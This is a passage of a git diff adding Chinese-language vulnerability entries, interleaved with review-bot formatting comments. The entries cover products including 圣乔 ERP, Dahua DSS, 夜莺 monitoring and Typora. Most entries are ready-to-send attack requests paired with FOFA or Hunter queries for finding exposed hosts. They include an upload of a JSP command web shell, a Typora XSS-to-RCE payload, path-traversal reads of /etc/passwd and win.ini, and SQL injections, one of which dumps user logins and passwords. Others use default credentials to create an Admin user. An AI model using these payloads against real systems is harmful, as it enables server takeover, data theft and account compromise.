DUAL)||CHR(113)||CHR(118)||CHR(122)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) +``` + +![image-20241211210001578](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112100655.png) \ No newline at end of file diff --git a/圣乔ERP系统uploadFile文件上传漏洞.md b/圣乔ERP系统uploadFile文件上传漏洞.md new file mode 100644 index 0000000..8792791 --- /dev/null +++ b/圣乔ERP系统uploadFile文件上传漏洞.md 
@@ -0,0 +1,33 @@ +# 圣乔ERP系统uploadFile文件上传漏洞 + +圣乔ERP系统 uploadFile.action 接口存在文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 + +## fofa + +```javascript +title="圣乔ERP系统" +``` + +## poc + +```javascript +POST /erp/wap/../uploadFile.action HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 +Content-Type: multipart/form-data boundary=----WebKitFormBoundaryssh7UfnPpGU7BXfK +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip +Connection: close + +------WebKitFormBoundaryssh7UfnPpGU7BXfK +Content-Disposition: form-data; name="Filedata"; filename="rce.jsp" +Content-Type: image/png + +<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("</pre>");new java.io.File(application.getRealPath(request.getServletPath())).delete();%> +------WebKitFormBoundaryssh7UfnPpGU7BXfK-- +``` + +![image-20241211210137494](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112101562.png) + +文件路径:`/erp/wap/../FileStorageDirectorynull/rce.jsp?cmd=whoami` \ No newline at end of file diff --git a/圣乔ERP系统存在struts2远程命令执行漏洞.md b/圣乔ERP系统存在struts2远程命令执行漏洞.md new file mode 100644 index 0000000..6d3688c --- /dev/null +++ b/圣乔ERP系统存在struts2远程命令执行漏洞.md 
@@ -0,0 +1,32 @@ +# 圣乔ERP系统存在struts2远程命令执行漏洞 + +# 一、漏洞简介 +杭州圣乔科技有限公司成立于2007年02月27日,注册地位于浙江省杭州市拱墅区和睦路555号201幢116室,法定代表人为张鹏。经营范围包括计算机软硬件、电子产品的技术开发、销售。圣乔ERP系统存在struts2远程命令执行漏洞 + +# 二、影响版本 ++ 圣乔ERP系统 + +# 三、资产测绘 ++ hunter`web.icon="d2c808114296ddd9e76e9c774d79bd43"` ++ fofa`app="圣乔-ERP系统"` ++ 特征 + +![1730869080978-12b99405-c009-4ad9-859b-18e58e139dc8.png](./img/iQrJOGDYU3xmx0IV/1730869080978-12b99405-c009-4ad9-859b-18e58e139dc8-963827.png) + +# 四、漏洞复现 +```java +/shengfeng/login.action +``` + +![1730869093319-2c1db21f-5781-4e14-a1a5-03075a51a6ee.png](./img/iQrJOGDYU3xmx0IV/1730869093319-2c1db21f-5781-4e14-a1a5-03075a51a6ee-323929.png) + +```plain +/erp/login.action +``` + +![1730905698826-0bcf624e-28b5-4c23-ba75-3bd4e21a4cdd.png](./img/iQrJOGDYU3xmx0IV/1730905698826-0bcf624e-28b5-4c23-ba75-3bd4e21a4cdd-226170.png) + + + +> 更新: 2024-11-27 10:00:07 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ht9nkwf0kxowxnhw> \ No newline at end of file diff --git a/地大信息-基础信息平台GetImg任意文件读取漏洞.md b/地大信息-基础信息平台GetImg任意文件读取漏洞.md new file mode 100644 index 0000000..65e2b2a --- /dev/null +++ b/地大信息-基础信息平台GetImg任意文件读取漏洞.md @@ -0,0 +1,20 @@ +# 地大信息-基础信息平台GetImg任意文件读取漏洞 + +地大信息-基础信息平台 GetImg 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取文件、数据库配置文件等等。 + +## fofa + +```javascript +body="/SystemManage/BaseProject" || title=="基础信息平台" +``` + +## poc + +```javascript +GET /SystemManage/BaseProject/GetImg?path=C:\windows\win.ini HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Connection: close +``` + +![image-20240918135731789](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409181357847.png) \ No newline at end of file diff --git a/基于Typora-DOM的跨站点脚本导致远程代码执行(CVE-2023-2317).md b/基于Typora-DOM的跨站点脚本导致远程代码执行(CVE-2023-2317).md new file mode 100644 index 0000000..1944768 --- /dev/null +++ b/基于Typora-DOM的跨站点脚本导致远程代码执行(CVE-2023-2317).md 
@@ -0,0 +1,13 @@ + +# 基于Typora DOM的跨站点脚本导致远程代码执行(CVE-2023-2317) + +## 漏洞简介 + +Windows和Linux版本1.6.7之前的Typora中updater/update.html中基于DOM的XSS允许特制的markdown文件通过加载在Typora主窗口的上下文中运行任意JavaScript代码`typora://app/typemark/updater/update.html`在<embed>标记中。如果用户在Typora中打开恶意降价文件,或者从恶意网页复制文本并将其粘贴到Typora,则可以利用此漏洞。 + +```html +<embed src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ'))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]"></embed> +``` + +## 漏洞复现 +https://mp.weixin.qq.com/s/Jssc5eW7FVcyWPL9IVHr9g diff --git a/多客圈子论坛系统httpGet存在任意文件读取漏洞.md b/多客圈子论坛系统httpGet存在任意文件读取漏洞.md new file mode 100644 index 0000000..8d95e13 --- /dev/null +++ b/多客圈子论坛系统httpGet存在任意文件读取漏洞.md @@ -0,0 +1,31 @@ +# 多客圈子论坛系统httpGet存在任意文件读取漏洞 + +# 一、漏洞简介 +多客圈子论坛系统是一种在线社区平台,旨在为用户提供一个共享知识、经验和想法的空间。社交圈子论坛系统除了提供基本的社交功能外,还可以根据用户行为和兴趣为用户推荐相关内容。 多客圈子论坛系统 httpGet接口处存在任意文件读取漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如客户记录、财务数据或源代码,导致数据泄露。 + +# 二、影响版本 ++ 多客圈子论坛系统 + +# 三、资产测绘 +```plain +body="/static/index/js/jweixin-1.2.0.js" +``` + +![1718072652587-1ddcb3fb-c3f2-46eb-a86c-0cfe7e1e8eb5.png](./img/LMSv_axjAY4hGuYk/1718072652587-1ddcb3fb-c3f2-46eb-a86c-0cfe7e1e8eb5-274680.png) + +# 四、漏洞复现 +```http +GET /index.php/api/login/httpGet?url=file:///etc/passwd HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive +``` + +![1718072728134-f5bfd022-8381-475a-8997-199ef1af84da.png](./img/LMSv_axjAY4hGuYk/1718072728134-f5bfd022-8381-475a-8997-199ef1af84da-138441.png) + + + +> 更新: 2024-06-17 09:34:03 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gv2apt8f7pypg1nt> \ No newline at end of file 
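Review bot: The description sentence in 圣乔ERP系统SingleRowQueryConvertor存在SQL注入漏洞.md is cut off: "未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息" opens an "除了…" clause that never gets its second half, so the reader cannot tell what else the author claims the flaw allows. Either finish the sentence or drop "除了". The two fences are tagged `javascript` although one holds a FOFA query and the other a raw HTTP request; `plain` and `http` match the rest of the repository. The file also lacks the 影响版本 and remediation information that the numbered-section entries carry, and the PoC's `c0-param0` Oracle `XMLType(...)` probe is identical in four new files (SingleRowQueryConvertor, getSupplyQueryKeyword, queryForMapWithDefaultValues, queryForString) that differ only in `c0-scriptName`/`c0-methodName`; one entry listing the affected DWR methods would be easier to maintain.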
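Review bot: The escaping in the downloadFile.action PoC is inconsistent: `file=c:\\windows\win.ini` doubles the first backslash and not the second, so it is unclear whether the literal request body or a string-escaped copy was pasted; write the path one way. The FOFA fingerprint here is `app="圣乔-ERP系统"` while the sibling 圣乔 entries use `title="圣乔ERP系统"`, so the files disagree on how to find the product. The fence tag `javascript` on a raw HTTP request should be `http`, and the "/erp/wap/../" prefix in the path deserves a sentence explaining why the traversal segment is part of the request, since that detail is what a reader checking a WAF rule or access log needs.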
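Review bot: The 圣乔ERP系统getSupplyQueryKeyword and queryForMapWithDefaultValues entries repeat the same truncated description ("…除了可以利用 SQL 注入漏洞获取数据库中的信息" with no following clause) and the same `javascript` fence tags on a FOFA query and an HTTP request; fix the sentence once and apply it to all copies. The queryForString entry additionally hard-codes `httpSessionId=47CA299619667847F1BB450454E6C2D4` and a `scriptSessionId`, which are values from one recorded session rather than constants of the PoC; mark them as placeholders so nobody treats them as required.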
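Review bot: 圣乔ERP系统login.action存在Struts2远程代码执行漏洞.md says only "历史Struts2远程代码执行漏洞" without naming the Struts2 advisory or the affected framework range, which is the one fact a defender needs to decide whether an upgrade fixes it; add the S2 advisory identifier if the author knows it, otherwise say it is unidentified. The description paragraph is a product brochure; the vulnerability information is the last sentence, and the rest could be trimmed. The fence tags (`javascript`) should be `plain` and `http`. Separately, 圣乔ERP系统存在struts2远程命令执行漏洞.md in the same commit covers the same `/erp/login.action` endpoint (plus `/shengfeng/login.action`), so the repository now has two entries for one issue; merge them, and note that the second file's 漏洞简介 consists of company registration details (address, legal representative) rather than anything about the flaw, and that its `java` fence wraps a URL path.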
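Review bot: The request in 圣乔ERP系统uploadFile文件上传漏洞.md is malformed: `Content-Type: multipart/form-data boundary=----WebKitFormBoundaryssh7UfnPpGU7BXfK` is missing the `;` between the media type and the `boundary` parameter, so a strict parser will not see a boundary at all. The trailing line "文件路径:`/erp/wap/../FileStorageDirectorynull/rce.jsp?cmd=whoami`" should explain where `FileStorageDirectorynull` comes from (the "null" suggests an unset storage-directory setting being concatenated into the path), because that is the detail an operator would use to locate uploaded files when checking for compromise.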
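Review bot: The Typora entry (CVE-2023-2317) contradicts itself on the vulnerable page: the text says `updater/update.html` while the payload loads `updater/updater.html`; only one can be right. The prose contains a raw `<embed>` that markdown will render as a tag rather than text; wrap it in backticks. "恶意降价文件" is a machine mistranslation of "malicious markdown file" and should read "恶意 markdown 文件". This is also the only entry in the commit that states a fixed version (1.6.7), which is good; the 漏洞复现 section, however, is just a WeChat link, so a one-line summary of what the reproduction shows would make the file self-contained.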
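Review bot: In 多客圈子论坛系统httpGet存在任意文件读取漏洞.md the PoC passes `url=file:///etc/passwd` to an endpoint named `httpGet`, i.e. the server fetches a caller-supplied URL; the root cause is therefore server-side request forgery with no scheme restriction, and the title "任意文件读取" describes only one consequence. Classifying it as SSRF makes the mitigation (scheme and host allow-list, authentication on the endpoint) obvious. The `http` fence tag here is correct and should be the model for the other entries.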
diff --git a/夜莺开源监控系统存在默认用户漏洞.md b/夜莺开源监控系统存在默认用户漏洞.md new file mode 100644 index 0000000..ca66d63 --- /dev/null +++ b/夜莺开源监控系统存在默认用户漏洞.md @@ -0,0 +1,34 @@ +# 夜莺开源监控系统存在默认用户漏洞 + +夜莺开源监控系统存在默认用户漏洞,/v1/n9e/接口401鉴权存在默认用户 +## fofa +```javascript +icon_hash="-2047686847" +``` + +## hunter +```javascript +web.body="icon-yijigaojing" +``` + +## poc + +```javascript +GET /v1/n9e/users HTTP/1.1 +Host: monitor.xxxx.com +Cache-Control: max-age=0 +Authorization: Basic dXNlcjAwMTpjY2MyNmRhN2I5YWJhNTMzY2JiMjYzYTM2YzA3ZGNjNQ== +``` + +``` +POST /v1/n9e/users HTTP/1.1 +Host: +Cache-Control: max-age=0 +Authorization: Basic dXNlcjAwMTpjY2MyNmRhN2I5YWJhNTMzY2JiMjYzYTM2YzA3ZGNjNQ== +Content-Type: application/json +Content-Length: 61 + +{"Username":"test","Password":"test","Roles":["Admin"]} +``` + +![image-20241018164816652](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181648722.png) \ No newline at end of file diff --git a/大为计算机软件开发有限公司知识产权协同创新管理系统任意密码重置.md b/大为计算机软件开发有限公司知识产权协同创新管理系统任意密码重置.md new file mode 100644 index 0000000..268de16 --- /dev/null +++ b/大为计算机软件开发有限公司知识产权协同创新管理系统任意密码重置.md @@ -0,0 +1,25 @@ +# 大为计算机软件开发有限公司知识产权协同创新管理系统任意密码重置 + +# 一、漏洞简介 +大为计算机软件开发有限公司知识产权协同创新管理系统存在任意密码重置漏洞 + +# 二、影响版本 ++ 大为计算机软件开发有限公司知识产权协同创新管理系统 + +# 三、资产测绘 ++ hunter`web.body="大为计算机软件开发有限公司"` ++ 特征 + +![1698767180872-69f83182-733b-43aa-a0c6-32a65e6b9fc9.png](./img/_6NIYiUWOeUtuWby/1698767180872-69f83182-733b-43aa-a0c6-32a65e6b9fc9-204217.png) + +# 四、漏洞复现 +```plain +/resetPwd.html?guid=IWBI9HveWf01GlDm+je0Ec+qvHyI7F5bjy3kRC2uESwC0+KPmTxUsgHqj+lUuY0F061yruzA+jkZFb9hhNqPhw%3D%3D +``` + +![1698767201134-b65db187-0983-47ba-a3f0-ad7bac489060.png](./img/_6NIYiUWOeUtuWby/1698767201134-b65db187-0983-47ba-a3f0-ad7bac489060-985558.png) + + + +> 更新: 2024-02-29 23:55:47 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rmi9xpgr32bsz4aq> \ No newline at end of file diff --git a/大华DSS-itcBulletin-SQL-注入漏洞.md b/大华DSS-itcBulletin-SQL-注入漏洞.md new file mode 100644 index 0000000..33e11de --- /dev/null 
+++ b/大华DSS-itcBulletin-SQL-注入漏洞.md 
@@ -0,0 +1,80 @@ +## 大华DSS itcBulletin SQL 注入漏洞 +大华DSS数字监控系统itcBulletin接口存在SQL注入漏洞,攻击者可以利用该漏洞获取数据库敏感信息。 + +## fofa +``` +app="dahua-DSS" +``` + +## poc +``` +POST /portal/services/itcBulletin?wsdl HTTP/1.1 +Host: x.x.x.x +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Connection: close +Content-Length: 345 +Accept-Encoding: gzip + +<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'> + <s11:Body> + <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'> + <netMarkings> + (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1 + </netMarkings> + </ns1:deleteBulletin> + </s11:Body> +</s11:Envelope> + + +POST /portal/services/itcBulletin?wsdl HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Accept-Encoding: gzip + +<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'> + <s11:Body> + <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'> + <netMarkings> + (updatexml(1,concat(0x7e,(select substr(group_concat(login_name, " ",login_pass),1,30) from sys_user),0x7e),1))) and (1=1 + </netMarkings> + </ns1:deleteBulletin> + </s11:Body> +</s11:Envelope> + +``` + +## nuclei poc +``` +id: dahua-dss-itcBulletin-sqli +info: + name: 大华DSS itcBulletin SQL注入漏洞 + author: fgz + severity: high + description: 大华DSS数字监控系统itcBulletin接口存在SQL注入漏洞,攻击者可以利用该漏洞获取数据库敏感信息。 + metadata: + fofa-query: app="dahua-DSS" + +requests: + - raw: + - |+ + POST /portal/services/itcBulletin?wsdl HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + + <s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'> + <s11:Body> + <ns1:deleteBulletin 
xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'> + <netMarkings> + (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1 + </netMarkings> + </ns1:deleteBulletin> + </s11:Body> + </s11:Envelope> + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'status_code==500 && contains(body,"error code [1105]") && contains(body,"6cfe798ba8e5b85feb50164c59f4bec")' +``` diff --git a/大华DSS数字监控系统attachment_downloadAtt.action任意文件读取漏洞.md b/大华DSS数字监控系统attachment_downloadAtt.action任意文件读取漏洞.md new file mode 100644 index 0000000..db3a3c3 --- /dev/null +++ b/大华DSS数字监控系统attachment_downloadAtt.action任意文件读取漏洞.md @@ -0,0 +1,23 @@ +# 大华DSS数字监控系统attachment_downloadAtt.action任意文件读取漏洞 + +大华DSS数字监控系统 attachment_downloadByUrlAtt.action接口存在任意文件读取漏洞,未经身份验证的远程攻击者 可以利用此漏洞获取系统内部敏感文件信息,使系统处于极不安全的状态。 + +## fofa + +```java +app="dahua-DSS" +``` + +## poc + +```javascript +GET /portal/attachment_downloadAtt.action?filePath=../../../../../../etc/passwd HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Connection: close +``` + +![image-20241211211500395](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112115457.png) \ No newline at end of file diff --git a/大华DSS视频管理系统attachment_clearTempFile存在SQL注入漏洞.md b/大华DSS视频管理系统attachment_clearTempFile存在SQL注入漏洞.md new file mode 100644 index 0000000..b5c5f28 --- /dev/null +++ b/大华DSS视频管理系统attachment_clearTempFile存在SQL注入漏洞.md 
@@ -0,0 +1,32 @@ +# 大华 DSS 视频管理系统attachment_clearTempFile存在SQL注入漏洞 + +# 一、漏洞简介 +<font style="color:rgb(0, 0, 0);">大华DSS城市安防监控平台是一个在通用安防视频监控系统基础上设计开发的系统。大华DSS城市安防监控平台attachment_clearTempFile文件存在SQL注入漏洞,攻击者可以通过此漏洞获取数据库权限。</font> + +# 二、影响版本 ++ 大华 DSS 视频管理系统 + +# 三、资产测绘 ++ hunter:`app.name=="Dahua 大华 DSS 视频管理系统"` + +![1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc.png](./img/8ALRMRupTeWfQbmC/1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc-419113.png) + ++ 登录页面 + +![1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590.png](./img/8ALRMRupTeWfQbmC/1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590-437522.png) + +# 四、漏洞复现 +```java +GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,md5(1),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Accept-Encoding: gzip +Connection: close +``` + +![1714291586245-19c2c45a-f9d8-4c77-af35-4f000ae2956c.png](./img/8ALRMRupTeWfQbmC/1714291586245-19c2c45a-f9d8-4c77-af35-4f000ae2956c-415198.png) + + + +> 更新: 2024-04-28 16:06:59 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bz9pqrmrb068vt05> \ No newline at end of file diff --git a/大华DSS视频管理系统attachment_downloadByUrlAtt.action任意文件下载漏洞.md b/大华DSS视频管理系统attachment_downloadByUrlAtt.action任意文件下载漏洞.md new file mode 100644 index 0000000..3865b7b --- /dev/null +++ b/大华DSS视频管理系统attachment_downloadByUrlAtt.action任意文件下载漏洞.md 
@@ -0,0 +1,28 @@ +# 大华 DSS 视频管理系统 attachment_downloadByUrlAtt.action 任意文件下载漏洞 + +# 一、漏洞简介 +大华 DSS 视频管理系统存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件 + +# 二、影响版本 ++ 大华 DSS 视频管理系统 + +# 三、资产测绘 ++ hunter:`app.name=="Dahua 大华 DSS 视频管理系统"` + +![1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc.png](./img/1dbzkkAvGIjPSiqY/1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc-774106.png) + ++ 登录页面 + +![1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590.png](./img/1dbzkkAvGIjPSiqY/1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590-214312.png) + +# 四、漏洞复现 +```plain +/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd +``` + +![1692014263697-ee82b115-ec78-4aa1-89bd-220bac635887.png](./img/1dbzkkAvGIjPSiqY/1692014263697-ee82b115-ec78-4aa1-89bd-220bac635887-605046.png) + + + +> 更新: 2024-02-29 23:57:19 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mb3iwwsxiz2bvrek> \ No newline at end of file diff --git a/大华DSS视频管理系统attachment_getAttList存在SQL注入漏洞.md b/大华DSS视频管理系统attachment_getAttList存在SQL注入漏洞.md new file mode 100644 index 0000000..7e4a8a1 --- /dev/null +++ b/大华DSS视频管理系统attachment_getAttList存在SQL注入漏洞.md 
@@ -0,0 +1,45 @@ +# 大华 DSS 视频管理系统attachment_getAttList存在SQL注入漏洞 + +# 一、漏洞简介 +大华 DSS 视频管理系统attachment_getAttList存在SQL注入漏洞 + +# 二、影响版本 ++ 大华 DSS 视频管理系统 + +# 三、资产测绘 ++ hunter:`app.name=="Dahua 大华 DSS 视频管理系统"` + +![1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc.png](./img/YEzgKXOoTrWvTvW9/1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc-455011.png) + ++ 登录页面 + +![1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590.png](./img/YEzgKXOoTrWvTvW9/1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590-535720.png) + +# 四、漏洞复现 +```java +GET /portal/attachment_getAttList.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x5c,0x716b6b6b71,(SELECT%20(ELT(8841=8841,1))),0x7178786271))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Connection: close +Content-Length: 345 +Accept-Encoding: gzip +``` + +![1712506894859-ae95ce46-c10f-470e-b0c3-73ac9f6f6f0b.png](./img/YEzgKXOoTrWvTvW9/1712506894859-ae95ce46-c10f-470e-b0c3-73ac9f6f6f0b-091764.png) + +```java +qkkkq1qxxbq +``` + +sqlmap + +```java +/portal/attachment_getAttList.action?bean.RecId=1&bean.TabName=1 +``` + +![1712506949280-220d14ff-c8ae-4bcc-a97b-988a8f0e5f4b.png](./img/YEzgKXOoTrWvTvW9/1712506949280-220d14ff-c8ae-4bcc-a97b-988a8f0e5f4b-184673.png) + + + +> 更新: 2024-04-28 16:08:12 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fqfir04lszoxzfkb> \ No newline at end of file diff --git a/大华DSS视频管理系统deleteBulletin存在SQL注入漏洞.md b/大华DSS视频管理系统deleteBulletin存在SQL注入漏洞.md new file mode 100644 index 0000000..3c01ab4 --- /dev/null +++ b/大华DSS视频管理系统deleteBulletin存在SQL注入漏洞.md 
@@ -0,0 +1,82 @@ +# 大华 DSS 视频管理系统deleteBulletin存在SQL注入漏洞 + +# 一、漏洞简介 +大华 DSS 视频管理系统deleteBulletin存在SQL注入漏洞。 + +# 二、影响版本 ++ 大华 DSS 视频管理系统 + +# 三、资产测绘 ++ hunter:`app.name=="Dahua 大华 DSS 视频管理系统"` + +![1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc.png](./img/GZOXqaqQQLQw2K7e/1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc-783855.png) + ++ 登录页面 + +![1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590.png](./img/GZOXqaqQQLQw2K7e/1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590-487732.png) + +# 四、漏洞复现 +```plain +POST /portal/services/itcBulletin HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=0F29FE3B0C2BF1E508A7119E327E2B44; JSESSIONID=D08F471237625640BE6F9DE648EC1EE6 +Upgrade-Insecure-Requests: 1 +SOAPAction: +Content-Type: text/xml;charset=UTF-8 +Host: +Content-Length: 436 + +<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:itc="http://itcbulletinservice.webservice.dssc.dahua.com"> + <soapenv:Header/> + <soapenv:Body> + <itc:deleteBulletin> + <!--type: string--> + <netMarkings>(UPDATEXML(5791,CONCAT(0x2e,0x716b706a71,(SELECT (ELT(5791=5791,1))),0x716a707a71),1058))</netMarkings> + </itc:deleteBulletin> + </soapenv:Body> +</soapenv:Envelope> +``` + +![1705141455973-c800e162-98db-44fe-911e-6cd0f90f3cd6.png](./img/GZOXqaqQQLQw2K7e/1705141455973-c800e162-98db-44fe-911e-6cd0f90f3cd6-633800.png) + +```plain +qkpjq1qjpzq +``` + +sqlmap + +```plain +POST /portal/services/itcBulletin HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: 
zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=0F29FE3B0C2BF1E508A7119E327E2B44; JSESSIONID=D08F471237625640BE6F9DE648EC1EE6 +Upgrade-Insecure-Requests: 1 +SOAPAction: +Content-Type: text/xml;charset=UTF-8 +Host: +Content-Length: 346 + +<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:itc="http://itcbulletinservice.webservice.dssc.dahua.com"> + <soapenv:Header/> + <soapenv:Body> + <itc:deleteBulletin> + <!--type: string--> + <netMarkings>gero et</netMarkings> + </itc:deleteBulletin> + </soapenv:Body> +</soapenv:Envelope> +``` + +![1705141497116-edc5d6fd-4ef0-4ca2-9084-2590cdabbc57.png](./img/GZOXqaqQQLQw2K7e/1705141497116-edc5d6fd-4ef0-4ca2-9084-2590cdabbc57-522695.png) + + + +> 更新: 2024-02-29 23:57:19 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xdk0wmobv78llhqb> \ No newline at end of file diff --git a/大华DSS视频管理系统user_edit存在密码泄漏漏洞.md b/大华DSS视频管理系统user_edit存在密码泄漏漏洞.md new file mode 100644 index 0000000..49f5423 --- /dev/null +++ b/大华DSS视频管理系统user_edit存在密码泄漏漏洞.md 
@@ -0,0 +1,36 @@ +# 大华 DSS 视频管理系统user_edit存在密码泄漏漏洞 + +# 一、漏洞简介 +DSS是大华的大型监控管理应用平台,支持几乎所有涉及监挂控等方面的操作,支持多级跨平台联网等操作。可将视频监控、卡口拍照、区间测速、电子地图、违章查询系统等诸多主流应用整合在一起,实现更加智能、便捷的分级查询服务。大华 DSS 视频管理系统user_edit存在密码泄漏漏洞。 + +# 二、影响版本 ++ 大华 DSS 视频管理系统 + +# 三、资产测绘 ++ hunter:`app.name=="Dahua 大华 DSS 视频管理系统"` + +![1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc.png](./img/dRGl6TsAKBTx2w2n/1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc-550589.png) + ++ 登录页面 + +![1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590.png](./img/dRGl6TsAKBTx2w2n/1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590-260486.png) + +# 四、漏洞复现 +```plain +GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=1B1D0EBCE3AC082FDBA00062678EAAC9; 